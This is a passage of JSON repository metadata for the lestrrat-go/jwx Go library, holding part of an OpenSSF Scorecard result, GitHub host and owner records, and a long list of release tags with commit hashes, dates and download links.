settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste